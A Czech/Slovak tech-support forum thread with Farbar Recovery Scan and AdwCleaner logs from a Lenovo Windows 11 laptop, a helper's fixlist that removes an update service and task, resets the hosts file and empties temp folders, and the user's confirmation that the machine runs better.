2025-02-28 12:39 - 2024-11-29 19:00 - 000101376 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2025-03-09 11:14 - 2025-03-09 11:14 - 001085952 _____ (Python Software Foundation) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\python27.dll
2025-03-09 11:04 - 2025-03-09 11:04 - 001085952 _____ (Python Software Foundation) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\python27.dll
2025-03-09 09:20 - 2025-03-09 09:20 - 001085952 _____ (Python Software Foundation) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\python27.dll
2025-03-09 11:14 - 2025-03-09 11:14 - 000076288 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\wxbase30u_net_vc90_x64.dll
2025-03-09 11:14 - 2025-03-09 11:14 - 001080320 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\wxbase30u_vc90_x64.dll
2025-03-09 11:14 - 2025-03-09 11:14 - 002272256 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI174642\wxmsw30u_core_vc90_x64.dll
2025-03-09 11:04 - 2025-03-09 11:04 - 000076288 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\wxbase30u_net_vc90_x64.dll
2025-03-09 11:04 - 2025-03-09 11:04 - 001080320 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\wxbase30u_vc90_x64.dll
2025-03-09 11:04 - 2025-03-09 11:04 - 002272256 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI41802\wxmsw30u_core_vc90_x64.dll
2025-03-09 09:20 - 2025-03-09 09:20 - 000076288 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\wxbase30u_net_vc90_x64.dll
2025-03-09 09:20 - 2025-03-09 09:20 - 001080320 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\wxbase30u_vc90_x64.dll
2025-03-09 09:20 - 2025-03-09 09:20 - 002272256 _____ (wxWidgets development team) [File not signed] C:\Users\LOQ\AppData\Local\Temp\_MEI66162\wxmsw30u_core_vc90_x64.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) =============


==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2022-05-07 06:24 - 2024-10-02 16:44 - 000001090 _____ C:\Windows\system32\drivers\etc\hosts
0.0.0.0 inference.location.live.net # managed by privacy.sexy
0.0.0.0 location-inference-westus.cloudapp.net # managed by privacy.sexy

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-4161793325-174424039-3687507759-1001\Control Panel\Desktop\\Wallpaper -> C:\IMG_2703.jpeg
DNS Servers: 192.168.0.5
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
HKU\S-1-5-21-4161793325-174424039-3687507759-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost => (EnableWebContentEvaluation: 0)
Windows Firewall is disabled.

Network Binding:
=============
Wi-Fi: Realtek RTL8852BE WiFi 6 802.11ax PCIe Adapter -> rtwlane601.sys
Připojení k místní síti: TAP-Windows Adapter V9 -> tap0901.sys
Ethernet: Realtek PCIe GbE Family Controller -> rt68cx21x64.sys
Ethernet 2: TAP-VyprVPN Adapter V9 -> tapvyprvpn.sys

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_585FC65EF5E8C80350E56398C7FD31DE"
HKU\S-1-5-21-4161793325-174424039-3687507759-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{E063FDC1-6038-400A-9922-4C9033806221}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{53C8E6F5-E35D-4A6C-8D4C-736BAD511F51}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{1E4D4B6C-FCA5-488E-9656-40DCB1C16AFB}] => (Allow) C:\Users\LOQ\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Limited)
FirewallRules: [{FD5DA27C-579D-4AF4-B3EB-CEE96AF3551D}] => (Allow) C:\Users\LOQ\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Limited)
FirewallRules: [{E397BD0E-A603-4681-A127-96CDA418ECA2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{3FE8EB9B-6FE6-4D99-A03A-395ED6CF405C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{B7AFA7DF-BE87-477D-9960-61867C211257}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> Lenovo)
FirewallRules: [{5200B0D9-5CF4-4D98-9080-1CF393A88024}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> Lenovo)
FirewallRules: [{B97910AD-DDCB-4439-BF22-E73AD0E238BD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{B094C816-ADFB-40D9-8DF7-9EA4FA6BB069}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{3E1E2CCC-B32C-41CC-9879-68063DE36689}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{CB624CB2-DB53-4B57-A380-6E6BED2F260E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{CA7103B4-7BA6-4A2D-89E2-40E450DF7181}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.92\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0B53BAE9-6F9B-4736-89AA-CAAFCB2418AF}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

04-03-2025 18:29:20 Windows Update
05-03-2025 19:57:44 Installed FxSound

==================== Faulty Device Manager Devices ============
Name: TAP-Windows Adapter V9
Description: TAP-Windows Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: tap0901
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: TAP-VyprVPN Adapter V9
Description: TAP-VyprVPN Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-VyprVPN Provider V9
Service: tapvyprvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: ========================

Application errors:
==================
Error: (03/06/2025 02:27:45 PM) (Source: Firefox Default Browser Agent) (EventID: 5) (User: )
Description: Event-ID 5

Error: (02/22/2025 11:28:17 AM) (Source: Firefox Default Browser Agent) (EventID: 5) (User: )
Description: Event-ID 5

Error: (02/04/2025 03:46:57 PM) (Source: Firefox Default Browser Agent) (EventID: 5) (User: )
Description: Event-ID 5

Error: (02/02/2025 05:04:27 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: VyprVPNWireGuardService.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: kód výjimky c0000005, adresa výjimky 00007FFEB9ADCE28

Error: (02/02/2025 05:03:59 PM) (Source: Firefox Default Browser Agent) (EventID: 5) (User: )
Description: Event-ID 5

Error: (01/18/2025 03:42:38 PM) (Source: Application Error) (EventID: 1000) (User: DESKTOP-LLM0I6O)
Description: Název chybující aplikace: xampp-control.exe, verze: 3.3.0.0, časové razítko: 0x606c4833
Název chybujícího modulu: xampp-control.exe, verze: 3.3.0.0, časové razítko: 0x606c4833
Kód výjimky: 0xc0000005
Posun chyby: 0x0025b292
ID chybujícího procesu: 0x0xaa0
Čas spuštění chybující aplikace: 0x0x1db69b700b2192f
Cesta k chybující aplikaci: C:\xampp\xampp-control.exe
Cesta k chybujícímu modulu: C:\xampp\xampp-control.exe
ID zprávy: 82c41c5c-061a-4391-a95f-b9bccdaed227
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (01/18/2025 09:21:35 AM) (Source: Application Error) (EventID: 1000) (User: DESKTOP-LLM0I6O)
Description: Název chybující aplikace: xampp-control.exe, verze: 3.3.0.0, časové razítko: 0x606c4833
Název chybujícího modulu: xampp-control.exe, verze: 3.3.0.0, časové razítko: 0x606c4833
Kód výjimky: 0xc0000005
Posun chyby: 0x0025b292
ID chybujícího procesu: 0x0x2440
Čas spuštění chybující aplikace: 0x0x1db6981df8a6ed1
Cesta k chybující aplikaci: C:\xampp\xampp-control.exe
Cesta k chybujícímu modulu: C:\xampp\xampp-control.exe
ID zprávy: c47446e7-07e3-48b1-8078-c9202811cb10
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (01/15/2025 11:41:18 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Chyba služby Stínová kopie svazků: Při volání rutiny CoCreateInstance došlo k neočekávané chybě. hr= 0x8007045b, Probíhá vypnutí systému..


System errors:
=============
Error: (03/09/2025 09:16:10 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1796) (User: NT AUTHORITY)
Description: The Secure Boot update failed to update a Secure Boot variable with error (-2147020471 = Zabezpečené spouštění není v tomto počítači zapnuto.). For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931

Error: (03/08/2025 04:55:57 PM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1796) (User: NT AUTHORITY)
Description: The Secure Boot update failed to update a Secure Boot variable with error (-2147020471 = Zabezpečené spouštění není v tomto počítači zapnuto.). For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931

Error: (03/08/2025 09:17:49 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1796) (User: NT AUTHORITY)
Description: The Secure Boot update failed to update a Secure Boot variable with error (-2147020471 = Zabezpečené spouštění není v tomto počítači zapnuto.). For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931

Error: (03/07/2025 09:15:20 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1796) (User: NT AUTHORITY)
Description: The Secure Boot update failed to update a Secure Boot variable with error (-2147020471 = Zabezpečené spouštění není v tomto počítači zapnuto.). For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931

Error: (03/06/2025 04:11:10 PM) (Source: Microsoft-Windows-BitLocker-Driver) (EventID: 24620) (User: NT AUTHORITY)
Description: Kontrola šifrovaného svazku: Informace o svazku F: nelze přečíst.

Error: (03/06/2025 04:11:10 PM) (Source: Microsoft-Windows-BitLocker-Driver) (EventID: 24620) (User: NT AUTHORITY)
Description: Kontrola šifrovaného svazku: Informace o svazku F: nelze přečíst.

Error: (03/06/2025 04:11:09 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Při čekání na odezvu transakce služby WSearch bylo dosaženo časového limitu (30000 ms).

Error: (03/06/2025 04:11:09 PM) (Source: Microsoft-Windows-BitLocker-Driver) (EventID: 24620) (User: DESKTOP-LLM0I6O)
Description: Kontrola šifrovaného svazku: Informace o svazku F: nelze přečíst.


Windows Defender:
================
Date: 2025-03-08 17:07:55
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2025-02-25 10:11:16
Description:
Antivirová ochrana v programu Microsoft Defender scan has been stopped before completion.
Scan Type: Antimalwarový program
Scan Parameters: Rychlé prohledávání

Date: 2025-02-24 13:41:58
Description:
Antivirová ochrana v programu Microsoft Defender scan has been stopped before completion.
Scan Type: Antimalwarový program
Scan Parameters: Rychlé prohledávání

Date: 2025-02-05 18:33:48
Description:
Antivirová ochrana v programu Microsoft Defender scan has been stopped before completion.
Scan Type: Antimalwarový program
Scan Parameters: Rychlé prohledávání

Date: 2025-02-04 18:50:43
Description:
Antivirová ochrana v programu Microsoft Defender scan has been stopped before completion.
Scan Type: Antimalwarový program
Scan Parameters: Rychlé prohledávání

CodeIntegrity:
===============
Date: 2025-03-09 15:25:40
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_75394611ca221846\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

BIOS: LENOVO NECN41WW 12/18/2024
Motherboard: LENOVO LNVNB161216
Processor: 12th Gen Intel(R) Core(TM) i5-12450HX
Percentage of memory in use: 25%
Total physical RAM: 24283.87 MB
Available physical RAM: 18059.5 MB
Total Virtual: 25819.87 MB
Available Virtual: 19520.99 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:174.92 GB) (Free:76.33 GB) (Model: Micron MTFDKCD512QFM-1BD1AABLA) NTFS
Drive d: (Dokumenty) (Fixed) (Total:301.16 GB) (Free:202.88 GB) (Model: Micron MTFDKCD512QFM-1BD1AABLA) NTFS

\\?\Volume{e6d345fa-fd91-40d9-808f-d652d1d1c2ba}\ () (Fixed) (Total:0.75 GB) (Free:0.07 GB) NTFS
\\?\Volume{0ad17750-9bad-49d6-abb1-8ecd0fefcd77}\ () (Fixed) (Total:0.09 GB) (Free:0.06 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt =======================

# -------------------------------
# Malwarebytes AdwCleaner 8.4.2.0
# -------------------------------
# Build: 03-04-2024
# Database: 2024-03-04.1 (Local)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 03-09-2025
# Duration: 00:00:09
# OS: Windows 11 (Build 22631.4890)
# Scanned: 32102
# Detected: 7


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

Preinstalled.LenovoIMController Folder C:\ProgramData\LENOVO\IMCONTROLLER
Preinstalled.LenovoIMController Folder C:\Users\LOQ\AppData\Local\LENOVO\IMCONTROLLER
Preinstalled.LenovoServiceBridge Folder C:\Users\LOQ\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE
Preinstalled.LenovoServiceBridge Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1
Preinstalled.LenovoUpdate Folder C:\Program Files (x86)\LENOVO\SYSTEM UPDATE
Preinstalled.LenovoUpdate Registry HKLM\Software\Wow6432Node\\Classes\CLSID\{03C6CC92-68F2-4961-9A73-CAECA350BD08}
Preinstalled.LenovoUpdate Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\TVSU_is1



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

[JaRon]

Ahoj,
pouzi fixlist s obsahom:

Start

CloseProcesses:

S2 uhssvc; "C:\Program Files\Microsoft Update Health Tools\uhssvc.exe" [X]

Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)


Hosts:


EmptyTemp:

End

[samsungs6edge]

Fix result of Farbar Recovery Scan Tool (x64) Version: 06-03-2025
Ran by LOQ (09-03-2025 17:24:24) Run:1
Running from C:\Users\LOQ\Desktop
Loaded Profiles: LOQ
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:

S2 uhssvc; "C:\Program Files\Microsoft Update Health Tools\uhssvc.exe" [X]

Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)


Hosts:


EmptyTemp:

End
*****************

Processes closed successfully.
HKLM\System\CurrentControlSet\Services\uhssvc => removed successfully
uhssvc => service removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 1048576 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 64359640 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 0 B
Windows/system/drivers => 19176885 B
Edge => 0 B
Chrome => 483884187 B

[JaRon]

Je to lepsie

[samsungs6edge]

Dobrý den, je to lepší. Děkuji mnohokrát za kontrolu.

[JaRon]

Rado sa stalo